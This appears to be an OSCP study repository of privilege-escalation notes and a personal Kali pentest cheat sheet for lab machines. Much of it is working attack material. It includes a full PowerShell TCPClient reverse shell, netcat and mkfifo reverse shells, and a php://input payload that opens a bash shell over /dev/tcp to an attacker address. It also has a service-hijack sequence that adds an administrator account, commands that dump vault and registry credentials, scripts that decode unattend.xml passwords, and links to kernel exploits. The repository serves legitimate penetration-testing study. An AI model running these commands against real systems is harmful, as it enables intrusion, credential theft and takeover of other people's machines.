├── Linux Privesc
├── Powershell_One_Liners.txt
├── README.md
├── Windows Privesc
└── cheat-sheet.txt
/Linux Privesc:
--------------------------------------------------------------------------------
# Linux Enumeration for Escalation to Root Access

### OS version

| Command | Result |
|---|---|
| `uname -a` | Print all available system information |
| `uname -r` | Kernel release |
| `uname -n` | System hostname |
| `hostname` | As above |
| `uname -m` | Kernel architecture (32 or 64 bit) |
| `cat /proc/version` | Kernel information |
| `cat /etc/*-release` | Distribution information |
| `cat /etc/issue` | As above |
| `cat /proc/cpuinfo` | CPU information |
| `df -a` | File system information |

----

### Users & Groups

| Command | Result |
|---|---|
| `cat /etc/passwd` | List all users on the system |
| `cat /etc/group` | List all groups on the system |
| `cat /etc/shadow` | Show user hashes - privileged command |
| `grep -v -E "^#" /etc/passwd \| awk -F: '$3 == 0 { print $1}'` | List all super user (uid 0) accounts |
| `finger` | Users currently logged in |
| `pinky` | As above |
| `users` | As above |
| `who -a` | As above |
| `w` | Who is currently logged in and what they're doing |
| `last` | Listing of last logged on users |
| `lastlog` | Information on when all users last logged in |
| `lastlog -u %username%` | Information on when the specified user last logged in |

---

### User & Privilege Information

| Command | Result |
|---|---|
| `whoami` | Current username |
| `id` | Current user information (uid, gid and group memberships) |
| `cat /etc/sudoers` | Who's allowed to do what as root - privileged command (also check `/etc/sudoers.d/`) |
| `sudo -l` | Can the current user run anything as root (look for NOPASSWD entries and for binaries with shell escapes) |

----

### Environmental Information

| Command | Result |
|---|---|
| `env` | Display environment variables |
| `set` | As above |
| `echo $PATH` | Path information (a writable directory early in PATH lets you hijack commands run by root) |
| `history` | Displays command history of current user |
| `pwd` | Print working directory, i.e. 'where am I' |
| `cat /etc/profile` | Display default system variables |

---

### Interesting Files

Globs are quoted so the shell does not expand them against the current directory before `find` sees them.

| Command | Result |
|---|---|
| `find / -perm -4000 -type f 2>/dev/null` | Find SUID files |
| `find / -uid 0 -perm -4000 -type f 2>/dev/null` | Find SUID files owned by root |
| `find / -perm -2000 -type f 2>/dev/null` | Find files with the SGID bit set |
| `find / -perm -2 -type f 2>/dev/null` | Find world-writable files |
| `find / -perm -2 -type d 2>/dev/null` | Find world-writable directories |
| `find /home -name "*.rhosts" -print 2>/dev/null` | Find rhost config files |
| `ls -ahlR /root/` | See if you can access other user directories to find interesting files - privileged command |
| `cat ~/.bash_history` | Show the current user's command history |
| `ls -la ~/.*_history` | Show the current user's various history files |
| `ls -la ~/.ssh/` | Check for interesting ssh files (keys, authorized_keys, known_hosts) in the current user's directory |
| `ls -la /usr/sbin/in.*` | Check configuration of inetd services |
| `grep -l -i pass /var/log/*.log 2>/dev/null` | Check log files for keywords ('pass' in this example) and show positive matches |
| `find /var/log -type f -exec ls -la {} \; 2>/dev/null` | List files in specified directory (/var/log) |
| `find /var/log -name "*.log" -type f -exec ls -la {} \; 2>/dev/null` | List .log files in specified directory (/var/log) |
| `find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null` | List .conf files in /etc (recursive 1 level) |
| `ls -la /etc/*.conf` | As above |
| `find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn password {} \; 2>/dev/null` | Find .conf files (recursive 4 levels) and output the line number where the word password is located |
| `lsof -i -n` | List open network sockets (output will depend on account privileges) |

----

### Service Information

| Command | Result |
|---|---|
| `ps aux \| grep root` | View processes running as root |
| `cat /etc/inetd.conf` | List services managed by inetd |
| `cat /etc/xinetd.conf` | As above for xinetd (per-service files live in `/etc/xinetd.d/`) |

----

### Jobs/Tasks

| Command | Result |
|---|---|
| `crontab -l -u %username%` | Display scheduled jobs for the specified user - privileged command |
| `ls -la /etc/cron*` | Scheduled jobs overview (hourly, daily, monthly etc) |
| `ls -aRl /etc/cron* \| awk '$1 ~ /w.$/' 2>/dev/null` | What can 'others' write in /etc/cron* directories |
| `cat /etc/crontab` | System crontab; each job runs as the user named in its sixth field, usually root |
| `top` | List of current tasks |

---

### Networking, Routing & Communications

| Command | Result |
|---|---|
| `/sbin/ifconfig -a` | List all network interfaces (`ip addr` on systems without net-tools) |
| `cat /etc/network/interfaces` | As above |
| `arp -a` | Display the ARP cache (`ip neigh` on systems without net-tools) |
| `route` | Display route information (`ip route` on systems without net-tools) |
| `cat /etc/resolv.conf` | Show configured DNS server addresses |
| `netstat -antp` | List all TCP sockets and related PIDs (-p only shows other users' PIDs when privileged; `ss -antp` is the modern equivalent) |
| `netstat -anup` | List all UDP sockets and related PIDs (as above; `ss -anup`) |
| `iptables -L` | List rules - privileged command |
| `cat /etc/services` | View port numbers/services mappings |

----

### Programs Installed

| Command | Result |
|---|---|
| `dpkg -l` | Installed packages (Debian) |
| `rpm -qa` | Installed packages (Red Hat) |
| `sudo -V` | Sudo version - does an exploit exist? |
| `httpd -v` | Apache version |
| `apache2 -v` | As above |
| `apache2ctl (or apachectl) -M` | List loaded Apache modules |
| `mysql --version` | Installed MySQL version details |
| `perl -v` | Installed Perl version details |
| `java -version` | Installed Java version details |
| `python --version` | Installed Python version details |
| `ruby -v` | Installed Ruby version details |
| `find / -name %program_name% 2>/dev/null` | Locate 'useful' programs (nc, netcat, wget, curl, nmap, python, gcc etc) |
| `which %program_name%` | As above, for programs in PATH |

----

### Common Shell Escape Sequences

| Command | Program(s) |
|---|---|
| `:!bash` | vi, vim |
| `:set shell=/bin/bash` followed by `:shell` | vi, vim |
| `!bash` | man, more, less |
| `find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;` | find |
| `awk 'BEGIN {system("/bin/bash")}'` | awk |
| `--interactive` then `!sh` | nmap (old releases only; interactive mode has been removed from current nmap) |
| `perl -e 'exec "/bin/bash";'` | Perl |

These escapes only give root when the program itself runs as root (a sudo rule or the SUID bit). When it is SUID, bash drops the effective uid back to yours unless started with `-p`, so use `bash -p` or `/bin/sh` as the escape shell.

--------------------------------------------------------------------------------
/Powershell_One_Liners.txt:
--------------------------------------------------------------------------------
#launch a reverse shell using native .NET in PowerShell (the well-known TCPClient one-liner; replace 10.10.14.6/4444 with your listener)
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.6",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


#document all tasks in Task Scheduler (look for tasks running as SYSTEM whose Command path or script you can write to)
$outcsv = "c:\temp\taskdef.csv" ; Get-ScheduledTask | ForEach-Object { [pscustomobject]@{ Name = $_.TaskName; Path = $_.TaskPath;LastResult = $(($_ | Get-ScheduledTaskInfo).LastTaskResult);NextRun = $(($_ | Get-ScheduledTaskInfo).NextRunTime);Status = $_.State;Command = $_.Actions.execute;Arguments = $_.Actions.Arguments }} |Export-Csv -Path $outcsv -NoTypeInformation -Force

#dump the Web Credentials stored in the Credential Manager vault (the WinRT PasswordVault; Windows Credentials such as the cmdkey /list entries live elsewhere and are not returned here)
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OSCP
--------------------------------------------------------------------------------
/Windows Privesc:
--------------------------------------------------------------------------------
# Windows Priv escalation

### Stored credentials
- Search for credentials in the setup answer files (unattend/sysprep) that Windows often leaves behind:
```
c:\unattend.xml
c:\Windows\Panther\Unattend.xml
c:\Windows\Panther\Unattend\Unattend.xml
c:\Windows\System32\sysprep\sysprep.xml
c:\sysprep.inf
c:\sysprep\sysprep.xml
```
- Unattend passwords are base64 of the UTF-16LE password with the literal word "Password" appended (unless the element has `<PlainText>true</PlainText>`, in which case the value is stored as-is). `base64 -d` reads a file or stdin, not an argument, so decode, drop the NUL bytes and strip the suffix:
```
user@host $ echo 'cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=' | base64 -d | tr -d '\0'
passwordPassword
```

- Metasploit Framework post modules post/windows/gather/enum_unattend and post/windows/gather/credentials/gpp (cached Group Policy Preferences cpassword):
```
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb
```

- Search the filesystem for VNC configs and for files that mention passwords (findstr takes the file masks as separate arguments; they are not piped into each other):
```
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /i vnc.ini

findstr /si password *.txt *.xml *.ini
findstr /si pass *.txt *.xml *.ini
```

- Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
```
http://www.nirsoft.net/password_recovery_tools.html
```
- Dumping cleartext credentials with mimikatz (needs an elevated context with SeDebugPrivilege, or SYSTEM)
```
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html
```
---------------------

### Reg Query


#### VNC Stored:
- reg query "HKCU\Software\ORL\WinVNC3" /v Password
- reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v password

#### Windows Autologin:
- reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" (look at DefaultUserName, DefaultDomainName and DefaultPassword)


#### SNMP Parameters:
- reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s (community strings and permitted managers)


#### PuTTY clear text proxy credentials:
- reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s (ProxyUsername / ProxyPassword values per saved session)


#### Search the registry - copy (pipe) to the clipboard (optional)
- reg query HKLM /f password /t REG_SZ /s [ |clip]
- reg query HKCU /f password /t REG_SZ /s [ |clip]

--------------------
### Change the upnphost service binary

Only works when your account can reconfigure the service (check with accesschk.exe -ucqv upnphost for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS) and can stop/start it. net start reports error 1053 because net.exe is not a real service, but the command has already run by then; repeat the sc config / net start pair for the group add.

```
sc qc upnphost
sc config upnphost binpath= "net user <user> <password> /add"
sc config upnphost obj= ".\LocalSystem" password= ""
net stop upnphost
net start upnphost
sc config upnphost binpath= "net localgroup administrators <user> /add"
net start upnphost
```

----------------------
## Local Exploit

### Vulnerability Privilege Escalation


#### Windows kernel privilege escalation
- KiTrap0D (MS10-015, CVE-2010-0232)
  - http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

- Tomcat Windows privilege escalation
  - http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows

- Windows kernel EoP (MS11-011) - Windows XP SP0-3: CVE-2011-0045, WmiTraceMessageVa integer truncation. The same bulletin fixed the NtGdiEnableEudc bug listed under UAC bypass below.
  - EDB-ID 16262 (platforms/windows/dos/16262): "MS11-011 (CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC", 2011-03-01, Nikita Tarakanov, windows/dos

```
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
```

- Service Tracing Key "Chimichurri" (MS10-059, CVE-2010-2554)
```
http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554
```

- Registry Symlink Vuln (MS10-021)
  - No public exploit - VUPEN membership only

- ryujin - afd.sys priv esc (MS11-080, CVE-2011-2005); the public exploit is a Python script, so package it with pyinstaller or py2exe when the target has no Python

```
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/
```

- UAC bypass priv esc: NtGdiEnableEudc stack overflow in win32k.sys (CVE-2010-4398, fixed in MS11-011)
```
http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info
```

Additional references, sources and other links:
- Encyclopaedia of Windows Privilege Escalation - Brett Moore (Ruxcon 2011)
  - http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/
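The unattend.xml decoding described under "Stored credentials", carried through as an added example (this is not code from the original page): pull every `<Password>` / `<AdministratorPassword>` value out of an answer file copied off the target and decode the encoded ones on Kali. The function names are mine, the sample file used in the test is constructed, and the NUL/CR stripping is a deliberate shortcut that assumes the tags and values are ASCII.

```shell
#!/bin/sh
# Added example (not from the original page): extract and decode the
# AutoLogon / AdministratorPassword values from an unattend.xml. Encoded
# values are base64 of UTF-16LE text with the literal word "Password"
# appended; <PlainText>true</PlainText> marks a value stored as-is.

# Decode one base64 unattend value to the plain password.
decode_unattend_password() {
    if command -v iconv >/dev/null 2>&1; then
        s=$(printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8)
    else
        # Fallback without iconv: dropping the NUL bytes is only correct
        # for ASCII passwords.
        s=$(printf '%s' "$1" | base64 -d | tr -d '\0')
    fi
    printf '%s\n' "${s%Password}"
}

# Print "base64<TAB>value" or "plain<TAB>value" for every <Password> or
# <AdministratorPassword> element that carries a <Value>. Windows writes
# unattend.xml as UTF-16 with CRLF; stripping NUL and CR bytes first is a
# crude but sufficient way to make the ASCII tags visible to awk.
extract_unattend_passwords() {
    tr -d '\r\0' < "$1" | awk '
        /<Value>/     { v = $0; sub(/.*<Value>/, "", v); sub(/<\/Value>.*/, "", v); val = v }
        /<PlainText>/ { plain = ($0 ~ /<PlainText>[ \t]*true/) }
        /<\/(Administrator)?Password>/ {
            if (val != "") { kind = plain ? "plain" : "base64"; print kind "\t" val }
            val = ""; plain = 0
        }'
}

# Decoded passwords, one per line, from an unattend.xml path.
unattend_passwords() {
    extract_unattend_passwords "$1" | while IFS="$(printf '\t')" read -r kind value; do
        if [ "$kind" = base64 ]; then
            decode_unattend_password "$value"
        else
            printf '%s\n' "$value"
        fi
    done
}

# Usage: sh unattend-pw.sh /path/to/Unattend.xml
if [ "${0##*/}" = "unattend-pw.sh" ]; then
    unattend_passwords "$1"
fi
```

The `${s%Password}` expansion strips the suffix only once and only at the end, so a real password that happens to end in "Password" would lose it; if the decoded value looks truncated, inspect the raw `base64 -d` output.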
--------------------------------------------------------------------------------
/cheat-sheet.txt:
--------------------------------------------------------------------------------
 ___ __ ___ _ __ ___| |__ ___ __ _| |_ ___| |__ ___ ___| |_
/ _ \/ __|/ __| '_ \ / __| '_ \ / _ \/ _` | __| / __| '_ \ / _ \/ _ \ __|
| (_) \__ \ (__| |_) | | (__| | | | __/ (_| | |_ \__ \ | | | __/ __/ |_
\___/|___/\___| .__/ \___|_| |_|\___|\__,_|\__| |___/_| |_|\___|\___|\__|
|_|

_ _ _
| |_ _ __ _ _ | |__ __ _ _ __ __| | ___ _ __
| __| '__| | | | | '_ \ / _` | '__/ _` |/ _ \ '__|
| |_| | | |_| | | | | | (_| | | | (_| | __/ |
\__|_| \__, | |_| |_|\__,_|_| \__,_|\___|_|
|___/

#remember most of these need root but I've not included SUDO because Kali doesn't feature this :)

##############################
#OSCP Cheat Sheet by Dan Card#
##############################
#Kali Setup & Command Reference
#DRAFT not tested

####################
# UPDATE KALI
###################
## ok so you probably want to run two VMs for the PWK and maybe the exam: one vanilla 32-bit PWK image which is not updated, and one 2018 Kali with the latest updates


apt-get update && apt-get upgrade


#############START POSTGRESQL on BOOT####################
sudo update-rc.d postgresql enable

##################################################
# SETUP VM TOOLS FOR SHARED FOLDERS AND COPY PASTA
##################################################

apt-get install open-vm-tools-desktop
# reboot afterwards; shared folders only appear once mounted with vmhgfs-fuse (.host:/ onto /mnt/hgfs)

##############################
# Update Python
##############################
apt-get install python-dev
apt-get install python-pip
apt-get install python3-dev
apt-get install python3-pip
# python-dev already pulls in python2.7-dev, and there is no python2.7-pip package


#######################
#Install PIP modules
#######################

pip install netifaces

####################
#Terminal Management
# The PWK image already includes terminator
####################
#Use terminator, byobu and/or tmux

apt-get install terminator
apt-get install tmux
apt-get install byobu


###############
# SETUP MSF
###############
#setup postgreSQL to start by default
update-rc.d postgresql enable
#initialise the database and check the connection
msfdb init
msfdb status
msfconsole
db_status
# msfdb init writes its own credentials to /usr/share/metasploit-framework/config/database.yml and msfconsole picks them up;
# only use db_connect if db_status says it is not connected, and use the user/password from database.yml (msf:msf below is a placeholder, not a default)
db_connect msf:msf@127.0.0.1:5432/msf
db_rebuild_cache
# db_rebuild_cache is Metasploit 4 only; Metasploit 5+ maintains the search cache itself and the command no longer exists
db_status

#setup global variables in MSF (setg makes a value apply to every module; plain set is per-module)
setg LHOST 10.10.10.10
setg LPORT 4444

############START SSH AND POSTGRESQL on BOOT (systemd equivalent of update-rc.d) #############
systemctl enable ssh
systemctl enable postgresql

#########################
#SIMPLE PYTHON WEB SERVER
########################
python -m SimpleHTTPServer 80
python3 -m http.server 80

#####################################
# Get all the tools into /pentest
#####################################
mkdir -p /pentest/tools /pentest/oscp /pentest/htb

####################################
# ENUMERATION
#####################################
###find ip and arpy things
netdiscover -i eth0
#add things to /etc/hosts if that's appropriate

#NMAP ALL THE THINGS
# -oA takes the output basename as its argument, so it must sit directly before the name (not before -v)
# -A already implies -sV -O --script=default --traceroute; a full -p- UDP scan with -sV takes hours, so run it last

nmap -Pn -sS -sV -T4 -O -A -vvvv -oA [targetname_tcpq] [targetIP/name]
nmap -Pn -sU -sV -T4 -O -A -vvvv -oA [targetname_udpq] [targetIP/name]
nmap -Pn -p- -sS -sV -T4 -O -A -vvvv -oA [targetname_tcpf] [targetIP/name]
nmap -Pn -p- -sU -sV -T4 -O -A -vvvv -oA [targetname_udpf] [targetIP/name]

nmap -Pn -p- -sV -T4 --script vuln 10.11.1.220

#check for SNMP
### check snmp public community string with version 1 (change as required)
snmp-check [target_ip] -c public -v 1
#########if found walk it#############
snmpwalk -v 1 -c public [target ip]

#CHECK for TFTP (a la stuxnet)
nmap -sU -p 69 --script tftp-enum.nse [targetIP/name]

#################SMTP ENUMERATION######################

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22


#####################################
# Web Application Enumeration Tools
#####################################
# run wafw00f to start with to check for application firewalls
# CMSMAP for scanning content management systems
# nikto for web application vulnerability scanning
# wpscan for wordpress
# joomscan for joomla

#curl the robots.txt file
curl http://[target_ip]/robots.txt


#forced browsing
#gobuster
#install (on current Kali it is packaged: apt-get install gobuster; building from the repo needs Go)
mkdir -p /pentest/tools
cd /pentest/tools
git clone https://github.com/OJ/gobuster.git

###########################WORDPRESS SCANNING#######################################
wpscan --url http://[target_ip] --enumerate p --enumerate u --enumerate t

#######################
### WEB SHELLS ########
#######################
##########PHP SHELLS################
#PHP BASH
cd /pentest/tools
#https://github.com/Arrexel/phpbash
git clone https://github.com/Arrexel/phpbash.git
#php-reverse-shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

#PHP simple command shell

https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php
#to launch a reverse shell from the command shell (start the listener on 10.10.14.xx port 666 first)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.xx 666 >/tmp/f

#alternate method (/bin/sh for targets without bash)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.xxx 4444 >/tmp/f



##########################FIREWALL#######################
# on kali you can use UFW or IPTABLES to protect your attacking machine

#install UFW

apt-get install ufw

#show the status
ufw status
#reset ufw to defaults
ufw reset

#enable the firewall (the default policy denies incoming, so allow the ports your listeners and web server use first, e.g. ufw allow 4444/tcp)
ufw enable



#########################GOBUSTER######################
### gobuster general command structure for a Linux server running PHP, connecting via a proxy (1.x/2.x syntax; gobuster 3+ needs the dir subcommand: gobuster dir -u ...)
gobuster -u http://bank.htb -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -p http://127.0.0.1:8080

######################################
######NETCAT shells on target
#######################################
nc [attacker_ip] 1234 -e /bin/sh

#################LISTENERS#################################

####a simple netcat listener on TCP 1234
nc -v -n -l -p 1234

### an msf listener
msfconsole

#what do you do if it's BSD (or any netcat built without -e) and doesn't have -e as an option!?
# use a named pipe: sh reads its commands from the pipe and nc writes whatever it receives into it

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc [attacker_ip] 1234 1>/tmp/backpipe

#sweeeeet!

#####################
#GREP search file contents of a directory
#############################################
#search file contents using a case insensitive recursive search
grep -rniw /pentest/HTB/bank/balance-transfer/bank.htb/balance-transfer/ -e 'success'



##############################WEB SERVER LFI##############################

#tools to help
#Kadimus
#https://github.com/P0cL4bs/Kadimus
#remember to install dependencies
# php://input RCE: the PHP given to -C is POSTed as the request body and executed by the include; point it at your listener on 10.11.0.xxx:4444
./kadimus -t 'https://[target]/section.php?page=php://input%00' -C '<?php system("bash -i >& /dev/tcp/10.11.0.xxx/4444 0>&1 2>&1"); ?>' -X input


##########################WINDOWS PRIV ESC
# AlwaysInstallElevated: any .msi installs as SYSTEM when BOTH of these values are 1.
# On a target, check them with reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated (and the same under HKLM),
# then install a malicious .msi (e.g. msfvenom -f msi). The REG ADD lines below are what an admin runs to create the weak policy
# (lab setup only; the HKLM value needs admin rights to write)
REG ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
REG ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1



###################LINUX ENUMERATION#################################
#ok so ideally use a tool such as LinEnum.sh, however we need to know how to do it manually.
#so first things first, let's see who I am
whoami
#now let's check my hostname
hostname
#now let's see what OS version I'm running
uname -a # -a is important to get all
##################
cat /etc/os-release
lsb_release -a
hostnamectl

uname -r #kernel version

#now let's see what access I have (uid, gid and groups such as docker, lxd, disk or sudo are all worth noting)
#######
id

#now let's see if I can run anything with elevated access
sudo -l

#######################################################################################
########################## POST EXPLOITATION ##########################################
#######################################################################################
#########WINDOWS POST EXPLOITATION##############
#rastamouse has two scripts, Sherlock (PowerShell) and Watson (.NET; Watson runs on .NET 2.0), for finding missing patches usable for priv esc
https://github.com/rasta-mouse/Watson

###############################################
######### POWER SHELL TO THE RESCUE ###########
###############################################
#PowerShell One Liners
#run a local script file
PowerShell.exe -ExecutionPolicy Unrestricted -File .\runme.ps1
#run a command block (-Command is needed; a bare Invoke-Command after the switches is not parsed as a command)
PowerShell.exe -ExecutionPolicy Unrestricted -Command "Invoke-Command -ScriptBlock {Write-Host 'Now I have a machine gun'}"

#POST EXPLOITATION LIVING OFF THE LAND
#so go find useful system information
# (this link covers the Linux side of OS version checks) --- https://www.cyberciti.biz/faq/how-to-check-os-version-in-linux-command-line/

hostname
whoami
ipconfig /all
route print
systeminfo
qwinsta
schtasks
at

#--------------------look for credentials
cmdkey /list


#######################LINUX Remote Desktop #######################
#rdesktop has a wide range of options
#remote desktop with clipboard sharing, window title SLAVE and use 80% of the screen
rdesktop -u administrator -p "Pa55w0rd1" -r clipboard:PRIMARYCLIPBOARD -T SLAVE -g 80% 10.11.1.221

#connect to the Windows 7 VM and mount the /tmp/ folder as a shared drive

rdesktop -u offsec -p Pa55w0rd1 -r disk:Temp=/tmp/ -T PWK-W7 -g 80% 10.11.16.xx


######### LINUX POST EXPLOITATION ##############
# on linux and unix systems BASH shell scripts can be useful after an initial shell has been achieved


#setup a python web server on attacker
#download LinEnum.sh from attacker to victim
wget http://10.11.0.xx/LinEnum.sh
#warning you might get access denied. if so try using the /tmp directory
#execute LinEnum.sh

#make this executable
chmod +x LinEnum.sh
./LinEnum.sh

#now we probably want to find some vulns as well

#https://github.com/belane/linux-soft-exploit-suggester
#https://github.com/mzet-/linux-exploit-suggester


################LINUX CAPABILITIES###################
# binaries carrying cap_setuid, cap_sys_admin, cap_dac_read_search etc. can be abused much like SUID binaries
getcap -r / 2>/dev/null
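The manual checks from the Linux Privesc tables, the LINUX ENUMERATION section above and the capabilities check, combined into one added example (this is not part of the original cheat sheet or of LinEnum.sh): a few POSIX sh functions that do the uid 0, SUID, world-writable cron, NOPASSWD sudo and file-capability checks. The function names are mine, inputs default to the live system but can be pointed at any file or directory, and the set of capabilities treated as dangerous is an assumption (the usual suspects), not an exhaustive list.

```shell
#!/bin/sh
# Added example: small POSIX sh helpers that combine the manual enumeration
# one-liners (uid 0 accounts, SUID binaries, world-writable cron entries,
# NOPASSWD sudo rules, dangerous file capabilities). Not from the cheat sheet
# or LinEnum.sh. Paths default to the live system but can be overridden so
# the functions can be tested against constructed input.

# Accounts with uid 0 in a passwd file. Anything other than "root" is either
# a backdoor or a misconfiguration worth a closer look.
uid0_accounts() {
    grep -v '^#' "${1:-/etc/passwd}" | awk -F: '$3 == 0 { print $1 }'
}

# SUID executables under a tree. -xdev stays on one filesystem so /proc and
# network mounts do not slow the scan; errors from unreadable dirs are dropped.
suid_files() {
    find "${1:-/}" -xdev -perm -4000 -type f 2>/dev/null
}

# Files or directories under a cron directory that 'others' can write to.
# A world-writable script run from root's cron is a direct route to root.
world_writable_cron() {
    find "${1:-/etc/cron.d}" -perm -0002 \( -type f -o -type d \) 2>/dev/null
}

# Commands that sudo will run without a password, parsed from "sudo -l"
# output on stdin (feed it: sudo -n -l 2>/dev/null | sudo_nopasswd_rules).
sudo_nopasswd_rules() {
    awk '/NOPASSWD:/ { sub(/.*NOPASSWD:[ \t]*/, ""); print }'
}

# Paths from "getcap -r /" output on stdin whose capabilities let a process
# change uid or bypass DAC. Handles both libcap output styles
# ("/path = cap_setuid+ep" and "/path cap_setuid=ep"). The list of
# capabilities treated as dangerous is an assumption, not exhaustive.
dangerous_caps() {
    awk '/cap_(setuid|setgid|sys_admin|sys_ptrace|sys_module|dac_override|dac_read_search|chown|fowner)/ { print $1 }'
}

# Run every check against the live system when executed directly.
if [ "${0##*/}" = "enum-lite.sh" ]; then
    echo "[uid 0 accounts]";         uid0_accounts
    echo "[SUID binaries]";          suid_files /
    echo "[world-writable cron]";    world_writable_cron /etc/cron.d
    echo "[NOPASSWD sudo rules]";    sudo -n -l 2>/dev/null | sudo_nopasswd_rules
    echo "[dangerous capabilities]"; getcap -r / 2>/dev/null | dangerous_caps
fi
```

`sudo -n` is used so a rule that does prompt for a password fails immediately instead of hanging a non-interactive shell; drop the `-n` when you have a proper tty and know the password.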
################################################



###################### KERNEL EXPLOITS ################################
#Look at the suggested exploits in relation to kernel exploits
#kernel exploits often need to be compiled
#if you can't compile on the victim compile them locally using gcc (match the target's kernel and glibc as closely as you can)
# if you want to compile a 32 bit binary on x64 kali use "gcc -m32" (needs the gcc-multilib package)

# Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
# https://www.exploit-db.com/exploits/8478/
# DIRTYC0W (CVE-2016-5195)
# NELSON (full-nelson, CVE-2010-4258)


#######################################################################################
#######################################################################################
################################## CRACKING ###########################################

#Crack a zip file using john (you may need to install the jumbo version of john and use the exact path to run the john binary)
# you need a word list: either use rockyou or generate one using data you have (e.g. run strings, or run cewl against a website etc.)
#first convert the zip file to john the ripper hash format using zip2john (use rar2john for rar files)
zip2john control.zip > ziphash
#next we need to run john and specify the format and the hash file and provide a wordlist
john --format=zip --wordlist=passwords.txt ziphash

#########################SHELL UPGRADES###########################
# if you have a limited shell on linux try this:
#PYTHON shell
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl-Z, run "stty raw -echo; fg" on the attacker side and "export TERM=xterm" in the shell, so tab completion works and Ctrl-C no longer kills the session

##################################ACTIVE DIRECTORY#################################
# if you ever need to use the GUI to search AD without tools installed use this:
%SystemRoot%\SYSTEM32\rundll32.exe dsquery,OpenQueryWindow


#ACTIVE DIRECTORY ENUMERATION
#rpcclient with NULL session bind: rpcclient -U "" -N [target_ip]  (then enumdomusers, querydominfo, etc.)

#RID ENUMERATION
# get ridenum from TrustedSec - https://github.com/trustedsec/ridenum
git clone https://github.com/trustedsec/ridenum
# needs python-pexpect
# may need creds if NULL sessions aren't enabled
python ridenum.py 10.11.1.220 500 50000

###DNS ENUMERATION
dnsrecon -d thinc.local -n 10.11.1.xx -D /usr/share/wordlists/subdomains-10000.txt -t std,srv,axfr -c /pentest/oscp/dns.csv


######################WEB TOOLS TO HELP YOU ON THE JOURNEY########################
#CYBER CHEF from GCHQ
https://gchq.github.io/CyberChef/

#The Magic tool will analyse data and try to work out its format, e.g. type/cat a zip file and copy it into the input
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false)


####################### Running BURP Suite when the target has a certificate issue#########################
#disable Java SNI for when your target site doesn't appear in burp suite and it's running TLS
java -Djsse.enableSNIExtension=false -jar burpsuite_community_v1.7.36.jar


#############LINUX TCP DUMP#################
#DUMP CLIENT CONNECTION HTTP HEADERS
#change the port to suit the server you are abusing (the filter keeps only TCP segments with a non-zero payload length, i.e. it drops bare ACKs)
